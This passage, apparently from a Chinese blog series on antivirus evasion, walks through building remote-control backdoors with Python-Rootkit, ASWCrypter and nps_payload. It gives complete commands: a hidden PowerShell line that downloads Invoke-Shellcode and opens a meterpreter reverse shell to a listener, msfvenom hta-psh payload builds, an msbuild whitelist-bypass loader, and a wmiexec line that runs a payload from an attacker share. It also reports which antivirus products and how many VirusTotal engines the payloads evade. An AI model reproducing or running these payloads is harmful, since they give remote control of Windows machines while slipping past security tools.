1. powershell.exe  -noprofile -windowstyle hidden iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.211.55.7 -Lport 3333 -Force;

复制代码

如果你没成功反弹shell，如果你安装的msf版本没问题，那么再确认一下你的windows测试机能否连接到https://raw.githubusercontent.com，如果不行的话那肯定执行不成功的。
​
可以在source.py中把远程服务器换成你自己的服务器地址
​
本地可以先测试一下，去掉-windowstyle hidden参数，可以看到ps代码执行情况。

1. powershell.exe  -noprofile  iex (new-object net.webclient).downloadstring('http://10.211.55.2/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 10.211.55.7 -Lport 3333 -Force;

复制代码

​

三、利用Python-Rootkit生成后门

在生成后门前，还需要找个.ico图标文件，放在viRu5文件夹中，这样viRu5文件夹里需要有下面几个文件
​
下面就可以生成后门了
python.exe setup.py
如果前面安装都没问题，就会出现这个界面
​
提示生成了后门GoogleChromeAutoLaunch.exe
​
使用msf进行监听windows/meterpreter/reverse_https
为什么是监听windows/meterpreter/reverse_https？因为Invoke-Shellcode.ps1只支持windows/meterpreter/reverse_https和windows/meterpreter/reverse_http的反弹msf的shell。
​
运行Python-Rootkit\viRu5\dist目录下的GoogleChromeAutoLaunch.exe,可正常上线
​
打开杀软进行测试，静态检测都可bypass，行为检测时火绒提示隐藏的powershell行为，关闭火绒后可正常上线，360安全卫士和杀毒都没有报警。
​
virustotal.com上查杀率为7/69，如果有动态检测，估计这个查杀率会非常高。
​

四、Python-Rootkit小结

Python-Rootkit在测试中因为msf5一直没法上线折腾了很长时间，官方issue居然没有反馈这个问题的，后来调试了半天发现是Invoke-Shellcode.ps1和msf的问题。
免杀效果整体感觉一般，还是python生成exe，执行后调用powershell下载Invoke-Shellcode.ps1，然后反弹shell，应该很容易触发杀软的行为检测。

五、参考

官方说明：https://github.com/0xIslamTaha/Python-Rootkit
Invoke-Shellcode crash：https://github.com/PowerShellMafia/PowerSploit/issues/39

wholesome

远控免杀专题(18)-ASWCrypter免杀(VT免杀率19-57)

---

免杀能力一览表

​
几点说明：
1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。
2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀或杀软查杀能力的判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

一、ASWCrypter介绍

ASWCrypter是2018年开源的免杀工具，原理比较简单，使用msf生成hta代码，然后使用python脚本对hta代码进行一定编码处理，生成新的hta后门文件，从而达到免杀效果。

二、安装ASWCrypter

需要本机安装metasploit和python环境。
ASWCrypter的安装比较简单,先git clone到本地

1. git clone https://github.com/AbedAlqaderSwedan1/ASWCrypter.git

复制代码

进入ASWCrypter目录，执行chmod +x ./ASWCrypter.sh。
执行./ASWCrypter.sh即可运行ASWCrypter。
​

三、ASWCrypter使用说明

使用时需要注意的只有一点，就是要在linux桌面环境中运行，因为在ASWCrypter.sh脚本中，调用msfvenom生成后门时使用了xterm。

1. xterm -T "SHELLCODE GENERATOR(ASWCrypter)" -geometry 100x50 -e "msfvenom -p $paylo LHOST=$lhost LPORT=$lport -i 43 -f hta-psh > $getPATH/output/chars.raw"

复制代码

四、利用ASWCrypter生成后门

执行./ASWCrypter.sh，选择G，第一步也只有这个能选
​
然后输入LHOST和LPORT
​
后门选择payload,我还是选择最常规的reverse_tcp了,文件名就随便输一个了
​
之后提示生成test4.hta成功，后面会提示是否开启msf监听，我这就不需要了，还是在mac上监听端口。
​
不开杀软的时候可正常上线
​
打开杀软，火绒静态和动态都能查杀，360动态+静态都没报警。
​
virustotal.com上查杀率为19/57
​
试了下msfvenom生成的原始的hta文件的查杀率

1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f hta-psh -o test5.hta

复制代码

virustotal.com上查杀率为28/56
​

五、ASWCrypter小结

ASWCrypter是使用msfvenom生成基于powershell的hta后门文件，然后进行编码处理，达到一定的免杀效果，不过因为会调用powershell，行为检测还是很容易被检测出来。

六、参考资料

官方Github:https://github.com/abedalqaderswedan1/aswcrypter

wholesome

远控免杀专题(19)-nps_payload免杀(VT免杀率3/57)

免杀能力一览表

​
几点说明：
1、上表中标识 √ 说明相应杀毒软件未检测出病毒，也就是代表了Bypass。
2、为了更好的对比效果，大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。
3、由于本机测试时只是安装了360全家桶和火绒，所以默认情况下360和火绒杀毒情况指的是静态+动态查杀。360杀毒版本5.0.0.8160(2020.01.01)，火绒版本5.0.34.16(2020.01.01)，360安全卫士12.0.0.2002(2020.01.01)。
4、其他杀软的检测指标是在virustotal.com（简称VT）上在线查杀，所以可能只是代表了静态查杀能力，数据仅供参考，不足以作为免杀或杀软查杀能力的判断指标。
5、完全不必要苛求一种免杀技术能bypass所有杀软，这样的技术肯定是有的，只是没被公开，一旦公开第二天就能被杀了，其实我们只要能bypass目标主机上的杀软就足够了。

---

一、nps_payload介绍

nps_payload是2017年开源的工具，安装使用都比较简单,nps_payload可以生成基于msbuild的xml文件和独立执行的hta文件，并对xml文件和hta文件做了一定的混淆免杀，从而达到免杀的效果。

二、安装nps_payload

1、克隆到本地

1. git clone  https://github.com/trustedsec/nps_payload

复制代码

2、安装py依赖

1. pip install -r requirements.txt

复制代码

3、运行python nps_payload.py
​

三、nps_payload使用说明

nps_payload生成的xml或hta文件都需要使用msbuild来执行。
Microsoft Build Engine是一个用于构建应用程序的平台，此引擎也被称为msbuild，它为项目文件提供一个XML模式，该模式控制构建平台如何处理和构建软件。Visual Studio使用MSBuild，但它不依赖于Visual Studio。通过在项目或解决方案文件中调用msbuild.exe，可以在未安装Visual Studio的环境中编译和生成程序。
说明：Msbuild.exe所在路径没有被系统添加PATH环境变量中，因此，Msbuild命令无法直接在cmd中使用。需要带上路径：C:\Windows\Microsoft.NET\Framework\v4.0.30319。
适用条件:.NET Framework>=4.0

nps_payload对xml文件和hta文件做的一些免杀是比较直接有效的：

​

三、利用nps_payload生成后门

我就以生成基于msbuild的xml文件为例进行演示。
执行python nps_payload.py，选择1，Generate msbuild/nps/msf payload
第2步payload选择1，windows/meterpreter/reverse_tcp
后面输入监听IP和端口
​
之后可生成后门文件
​
我们需要用到的只有msbuild_nps.xml这一个文件
​
msbuild_nps.xml文件内容如下，命令经过了编码处理
​
文件的执行方式有两种

1. 1. 本地加载执行:
   
2. - %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml
   
3. 
   
4. 2. 远程文件执行:
   
5. 
   
6. wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml

复制代码

我这里就用本地加载进行测试，msbuild.exe在windows中的的一般路径为C:\windows\microsoft.net\framework\v4.0.30319\msbuild.exe
​
msfconsole监听相应payload和端口，可正常上线
​
打开杀软进行测试
​
virustotal.com上查杀率为3/56
​
使用nps_payload生成的hta文件，virustotal.com上查杀率为7/57。(msf直接生成的hta-psh文件查杀为28/57,msfvenom -a x86 -p windows/meterpreter/reverse_https LHOST=10.211.55.2 LPORT=3333 -f hta-psh -o test.hta)
​

四、nps_payload小结

基于白名单的执行payload侯亮大神讲的比较多了，nps_payload只是使用了其中的msbuild.exe方法，nps_payload还对生成的文件进行了混淆处理，使用非常简单，免杀效果也是不错的。

五、参考资料

官方Github：https://github.com/trustedsec/nps_payload
基于白名单Msbuild.exe执行payload第一季：https://micro8.gitbook.io/micro8 ... ng-payload-di-yi-ji
使用msbuild.exe绕过应用程序白名单（多种方法）:https://www.cnblogs.com/backlion/p/10490573.html